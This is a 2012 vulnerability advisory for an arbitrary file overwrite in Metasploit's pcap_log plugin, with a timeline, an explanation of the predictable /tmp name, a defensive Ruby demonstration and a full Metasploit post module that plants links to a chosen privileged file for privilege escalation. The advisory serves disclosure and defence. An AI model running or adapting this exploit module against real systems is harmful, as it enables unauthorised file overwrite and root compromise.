Metasploit pcap_log Privilege Escalation

Posted Jul 17, 2012
Authored by 0a29406d9794e4f9b30b3c5d6702c708

Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug which can further be leveraged to insert user-controlled data resulting in potential escalation of privileges. Metasploit module included.

tags | exploit, arbitrary
SHA-256 | a3608689ff5f6a56679189ea8149e0e805de1c706fb7d3fedff592abe11d622b

================
0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================
Description:
================

Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug
which can further be leveraged to insert user-controlled data resulting in
potential escalation of privileges

================
Timeline:
================

16 July 2012 - Reported
16 July 2012 - Acknowledged & fixed by HD Moore
https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740
16 July 2012 - Public disclosure
http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html
================
Details:
================

By default the pcap_log plugin (plugins/pcap_log.rb) logs pcap data to a file
such as '/tmp/msf3-session_2012-07-16_15-15-35.pcap'. That name is of course
predictable, so a link ('ln') created in advance, pointing the expected
path at a privileged file, results in an arbitrary file overwrite. The
module has to run as root for this to matter.

Here's the fun part: by sending packets we can then insert our own content
into any file (surrounded by pcap headers and all the other packets).
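The bug class here is a predictable file name in a shared directory combined with an open that follows whatever is already at that path. The Ruby below is an added illustration (not the advisory's PoC and not the pcap_log plugin's code, before or after HD Moore's fix): it reproduces the advisory's naming scheme, shows in a scratch directory that a naive open at that path follows a pre-planted symlink, and contrasts it with an opener that uses an unpredictable name plus O_CREAT|O_EXCL (and O_NOFOLLOW where available) so a pre-existing path is refused rather than overwritten. The directory, the "victim.txt" stand-in file and the helper names are all constructed for this example.

```ruby
require 'securerandom'
require 'tmpdir'

# The predictable naming scheme the advisory describes for the original plugin.
# Anyone who can guess the second the session starts can pre-create this path.
def predictable_pcap_path(dir, t = Time.now)
  File.join(dir, "msf3-session_%04d-%02d-%02d_%02d-%02d-%02d.pcap" %
    [t.year, t.month, t.mday, t.hour, t.min, t.sec])
end

# Flags for a hardened open: we must create the file ourselves (CREAT|EXCL),
# so any pre-existing path, symlink or not, is refused; NOFOLLOW (where the
# platform exposes it) is defence in depth against a link at that name.
def hardened_open_flags
  flags = File::WRONLY | File::CREAT | File::EXCL
  flags |= File::NOFOLLOW if File.const_defined?(:NOFOLLOW)
  flags
end

# Open a log file under an unpredictable name with exclusive creation and
# owner-only permissions. Returns [path, io]; retries on a name collision.
def open_pcap_log_safely(dir, prefix = "msf-session")
  10.times do
    path = File.join(dir, "#{prefix}-#{SecureRandom.hex(16)}.pcap")
    begin
      io = File.open(path, hardened_open_flags, 0600)
      return [path, io]
    rescue Errno::EEXIST
      next
    end
  end
  raise "could not create a unique log file in #{dir}"
end

# Scratch demonstration in a throwaway directory: a symlink is planted at the
# predictable name, then both openers are tried against it.
# Returns a hash describing what each open did.
def demonstrate_symlink_hazard(dir)
  victim = File.join(dir, "victim.txt")   # constructed stand-in for a privileged file
  File.write(victim, "original\n")
  planted = predictable_pcap_path(dir)
  File.symlink(victim, planted)

  # Naive open (the advisory's bug class): follows the link and truncates victim.
  File.open(planted, "wb") { |f| f.write("pcap bytes\n") }
  naive_clobbered = File.read(victim) != "original\n"

  # Hardened flags at the very same planted path: the open is refused.
  hardened_refused = begin
    File.open(planted, hardened_open_flags, 0600) { |_f| }
    false
  rescue Errno::EEXIST, Errno::ELOOP
    true
  end

  # The random-name opener never lands on the planted path at all.
  path, io = open_pcap_log_safely(dir)
  io.close
  st = File.lstat(path)
  {
    naive_clobbered:     naive_clobbered,
    hardened_refused:    hardened_refused,
    random_path_differs: path != planted,
    regular_file:        st.file? && !st.symlink?,
    owner_only_mode:     (st.mode & 0777) == 0600,
  }
end

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir("pcap-demo") { |d| p demonstrate_symlink_hazard(d) }
end
```

Run as a script it prints the result hash from a fresh temporary directory; the interesting lines are `naive_clobbered: true` against `hardened_refused: true`. The exclusive-create flags are what close the race, since checking for a symlink with lstat before opening would leave a window; the unpredictable name only removes the attacker's ability to pick the path in advance.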

======
Sample PoC (needs work)

modules/post/linux/exploit/metasploit_pcaplog.rb
======

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'

class Metasploit3 < Msf::Post

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Linux::System

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Metasploit plugin "pcap_log" arbitrary file overwrite / privilege escalation',
      'Description'    => %q{
        Post exploitation module to exploit 0A29-12-2, a vulnerability in the
        Metasploit pcap_log plugin. Depending on the file you choose to
        overwrite, you will need to netcat/telnet etc. the data that you wish
        to appear in the file.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ '0a29406d9794e4f9b30b3c5d6702c708' ],
      'Version'        => '$Revision$',
      'Platform'       => [ 'linux' ],
      'SessionTypes'   => [ 'shell', 'meterpreter' ],
      'References'     =>
        [
          [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html' ],
          [ 'URL', 'https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740' ]
        ],
      'DisclosureDate' => "July 16 2012"
    ))

    register_options([
      OptInt.new('NUMBER', [true, 'Number of seconds to prime /tmp/ with', nil]),
      OptString.new('FILE', [true, 'File to overwrite with PCAP data', nil]),
    ], self.class)
  end

  # Build the predictable pcap_log file name for time t and link FILE to it.
  def link(t)
    file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [
      "msf3-session", t.year, t.month, t.mday, t.hour, t.min, t.sec
    ]
    fname = ::File.join("/tmp", file_part)
    retval = session.shell_command("/bin/ln #{datastore['FILE']} #{fname}")
  end

  # Run Method for when run command is issued
  def run
    for i in 0..(datastore['NUMBER'])
      link(Time.now+1)
    end
    print_status("Set #{datastore['NUMBER']} links.")
  end

  def cleanup
    print_status("Manual cleanup required: rm -f /tmp/msf3-session*")
  end
end